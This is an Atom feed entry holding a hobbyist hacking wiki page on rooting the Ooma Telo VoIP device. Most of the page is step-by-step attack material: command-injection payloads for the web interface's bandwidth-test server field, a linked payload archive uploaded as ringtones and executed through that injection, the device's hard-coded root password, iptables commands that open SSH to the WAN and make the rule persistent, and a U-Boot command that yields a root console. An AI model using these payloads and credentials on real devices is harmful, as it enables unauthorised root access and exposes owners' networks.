<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://wiki.exploitee.rs/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Trips</id>
	<title>Exploitee.rs - User contributions [en]</title>
	<link rel="self" type="application/atom+xml" href="https://wiki.exploitee.rs/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Trips"/>
	<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Special:Contributions/Trips"/>
	<updated>2026-05-07T16:43:21Z</updated>
	<subtitle>User contributions</subtitle>
	<generator>MediaWiki 1.45.0-alpha</generator>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Ooma_Telo&amp;diff=2456</id>
		<title>Ooma Telo</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Ooma_Telo&amp;diff=2456"/>
		<updated>2015-05-09T21:19:50Z</updated>

		<summary type="html">&lt;p&gt;Trips: Added new serial exploit&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:Ooma_Telo.jpg|200px|left|thumb]]&lt;br /&gt;
[[Category:VOIP]]&lt;br /&gt;
This page will be dedicated to a general overview, descriptions, and information related to the Ooma Telo.&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
[http://www.amazon.com/gp/product/B002O3W4LE/ref=as_li_tl?ie=UTF8&amp;amp;camp=1789&amp;amp;creative=390957&amp;amp;creativeASIN=B002O3W4LE&amp;amp;linkCode=as2&amp;amp;tag=gtvcom-20&amp;amp;linkId=EBJAMKMCFKJMDU4E Purchase the Ooma Telo at Amazon]&lt;br /&gt;
&lt;br /&gt;
== GPL ==&lt;br /&gt;
You can find GPL code for the [http://ooma.com/legal/ooma-gnu-linux-source-code Ooma Telo​​ Here]&lt;br /&gt;
&lt;br /&gt;
== Disassembly ==&lt;br /&gt;
&amp;lt;gallery&amp;gt;&lt;br /&gt;
File: Ooma_Telo_000.jpg&lt;br /&gt;
File: Ooma_Telo_001.jpg&lt;br /&gt;
File: Ooma_Telo_002.jpg&lt;br /&gt;
File: Ooma_Telo_003.jpg&lt;br /&gt;
File: Ooma_Telo_004.jpg&lt;br /&gt;
File: Ooma_Telo_006.jpg&lt;br /&gt;
File: Ooma_Telo_007.jpg&lt;br /&gt;
File: Ooma_Telo_008.jpg&lt;br /&gt;
File: &lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== UART ==&lt;br /&gt;
&amp;lt;gallery&amp;gt;&lt;br /&gt;
File:Ooma_Telo_UART.jpg&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Exploiting the Ooma Web Interface (iPerf) ==&lt;br /&gt;
* In order to access the Ooma Telo panel web interface you must either be plugged into the &amp;quot;LAN&amp;quot; port on the back of the device OR have the &amp;quot;remote administration&amp;quot; checkbox checked in the Ooma web interface panel.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Option 1&#039;&#039;&#039;&lt;br /&gt;
# Visit the Ooma web interface (The default IP for the LAN side is [http://172.27.35.1/])&lt;br /&gt;
# In the left menu panel click &amp;quot;Tools&amp;quot;&lt;br /&gt;
# In the left panel click &amp;quot;Bandwidth&amp;quot;&lt;br /&gt;
# In the server field you can enter in any in the following syntax &amp;lt;pre&amp;gt;a.com$(COMMANDHERE)&amp;lt;/pre&amp;gt;&lt;br /&gt;
# Click &amp;quot;Run Test&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Option 2&#039;&#039;&#039;&lt;br /&gt;
# [http://download.gtvhacker.com/file/ooma/telo/OomaPwn.zip Download OomaPwn.zip]&lt;br /&gt;
# Visit the Ooma web interface (The default IP for the LAN side is [http://172.27.35.1/])&lt;br /&gt;
# Go to Ringtones and upload both .wav files from downloaded OomaPwn.zip&lt;br /&gt;
# Navigate to Tools -&amp;gt; Bandwidth&lt;br /&gt;
# Enter the following one at a time into the Server IP Address&lt;br /&gt;
#:      Note: It will report an error, this is normal.&amp;lt;pre&amp;gt;$(chmod 755 /media/ringtone/*pwn.wav)&amp;lt;/pre&amp;gt;&amp;lt;pre&amp;gt;$(/bin/sh /media/ringtone/*pwn.wav)&amp;lt;/pre&amp;gt;&lt;br /&gt;
# When the script is done the Ooma unit will reboot&lt;br /&gt;
# You now have SSH access to the unit. root password is !ooma123&lt;br /&gt;
&lt;br /&gt;
== Demo ==&lt;br /&gt;
{{#ev:youtube|dXet8HHHBdg}}&lt;br /&gt;
&lt;br /&gt;
== Dropbear SSHD ==&lt;br /&gt;
The default credentials for the Ooma Telo are:&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Username:&#039;&#039;&#039; root&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Password:&#039;&#039;&#039; !ooma123&lt;br /&gt;
&lt;br /&gt;
Dropbear runs on kernel boot by default but is blocked by iptable rules.&lt;br /&gt;
&lt;br /&gt;
== IPTable Rules ==&lt;br /&gt;
Remote command execution through iperf screen hostname:&lt;br /&gt;
&amp;lt;pre&amp;gt;x.com$(reboot)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enable LAN SSH&lt;br /&gt;
&amp;lt;pre&amp;gt;x.com$(iptables -t filter -A LAN_SSH -j ACCEPT)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enable SSH on WAN&lt;br /&gt;
&amp;lt;pre&amp;gt;x.com$(iptables -t filter -I FireWall 1 -p tcp --destination-port 22 -j ACCEPT)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Permanently edit iptables rule (till next update)&lt;br /&gt;
&amp;lt;pre&amp;gt;mount -o,remount -rw -t ubifs ubi0:rootfsa /&lt;br /&gt;
echo -e &amp;quot;\n#Add sshd server\niptables -t filter -I FireWall 1 -p tcp --destination-port 22 -j ACCEPT&amp;quot; &amp;gt;&amp;gt;  /etc/ip_table.rules&lt;br /&gt;
mount -o,remount -r -t ubifs ubi0:rootfsa /&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Enable Console from U-Boot ==&lt;br /&gt;
In newer Ooma firmwares, serial is disabled by default. A root prompt can be triggered by creating a UBI partition with the name of serial.&lt;br /&gt;
&lt;br /&gt;
From the U-Boot console, enter the following:&lt;br /&gt;
&amp;lt;pre&amp;gt;run ubipart; ubi create serial 128; reset;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This also works on the newer Ooma Telo hardware. Shoutout to Trips for finding this.&lt;/div&gt;</summary>
		<author><name>Trips</name></author>
	</entry>
</feed>